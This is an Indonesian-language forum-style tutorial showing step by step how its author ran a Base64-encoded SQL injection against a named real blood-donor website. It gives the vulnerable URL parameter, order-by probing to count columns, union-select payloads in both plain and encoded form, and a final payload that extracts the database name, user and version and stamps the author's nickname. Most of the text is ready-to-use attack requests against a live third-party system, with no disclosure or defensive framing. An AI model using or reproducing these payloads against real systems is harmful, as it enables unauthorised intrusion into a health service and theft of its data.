-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL injection Base64
-
Disini gw cuma share cara melakukannya saja.
Target : ayodonor.pmi.or.id
> Pertama kita cari parameter dari website tersebut.
Disini saya sudah mendapatkan parameter nya, yaitu :
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNQ==&prov=Daerah%20Istimewa%20Yogyakarta
> Di parameter tersebut kita mendapatkan encode MjAyMC0wNi0xNQ== kita decode terlebih dahulu.
> Maka menjadi :
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15&prov=Daerah%20Istimewa%20Yogyakarta
> sekarang kita masuk ke bagian injeksi nya.
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15'&prov=Daerah%20Istimewa%20Yogyakarta
> Encode terlebih dahulu bagian 2020-06-15'
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNSc=&prov=Daerah%20Istimewa%20Yogyakarta
> terlihat berbeda dengan sebelumnya.
> kita masuk ke tahap order by untuk menentukan jumlah column.
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' order by 1-- -&prov=Daerah%20Istimewa%20Yogyakarta ~> normal
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' order by 5-- -&prov=Daerah%20Istimewa%20Yogyakarta ~> normal
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' order by 6-- -&prov=Daerah%20Istimewa%20Yogyakarta ~> normal
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' order by 7-- -&prov=Daerah%20Istimewa%20Yogyakarta ~> error
> Kita encode
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgb3JkZXIgYnkgMS0tIC0=&prov=Daerah%20Istimewa%20Yogyakarta ~> normal
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgb3JkZXIgYnkgNS0tIC0=&prov=Daerah%20Istimewa%20Yogyakarta ~> normal
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgb3JkZXIgYnkgNi0tIC0=&prov=Daerah%20Istimewa%20Yogyakarta ~> normal
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgb3JkZXIgYnkgNy0tIC0=&prov=Daerah%20Istimewa%20Yogyakarta ~> error
> batas column hanya 6. Jika lebih? Maka akan error.
> sekarang masuk ke tahap union select untuk mendapatkan angka ajaib
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' union select 1,2,3,4,5,6-- -&prov=Daerah%20Istimewa%20Yogyakarta
> kita encode
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgdW5pb24gc2VsZWN0IDEsMiwzLDQsNSw2LS0gLQ==&prov=Daerah%20Istimewa%20Yogyakarta
> tidak muncul angka ajaib? Tenang kita panggil saja dengan menaruh and 0 sesudah '
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' and 0 union select 1,2,3,4,5,6-- -&prov=Daerah%20Istimewa%20Yogyakarta
> kita encode lagi
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgYW5kIDAgdW5pb24gc2VsZWN0IDEsMiwzLDQsNSw2LS0gLQ==&prov=Daerah%20Istimewa%20Yogyakarta
> dan kita diberi angka 1,3,4,5,6 untuk di gunakan.
> jika sudah seperti ini kalian bebas melakukan apa saja.
Contoh :
- user() / user_name() / current_user = untuk melihat user yang di pakai.
- database() / db_name() = untuk melihat database yang di pakai.
- @@version / version() = untuk melihat versi yang di pakai.
- @@datadir = untuk melihat directory letak database.
- @@hostname = untuk melihat host
- @@global.have_symlink = untuk mengecek symlink.
Dan lainnya.
Disini saya hanya ingin melihat database,user,version dan ngeprint nick saja.
Hasil :
http://ayodonor.pmi.or.id/detailmu.php?module=2020-06-15' and 0 union select 'injected by 1K4lL_*',2,database(),user(),version(),6-- -&prov=Daerah%20Istimewa%20Yogyakarta
> encode
http://ayodonor.pmi.or.id/detailmu.php?module=MjAyMC0wNi0xNScgYW5kIDAgdW5pb24gc2VsZWN0ICdpbmplY3RlZCBieSAxSzRsTF8qJywyLGRhdGFiYXNlKCksdXNlcigpLHZlcnNpb24oKSw2LS0gLQ==&prov=Daerah%20Istimewa%20Yogyakarta
Thanks
See
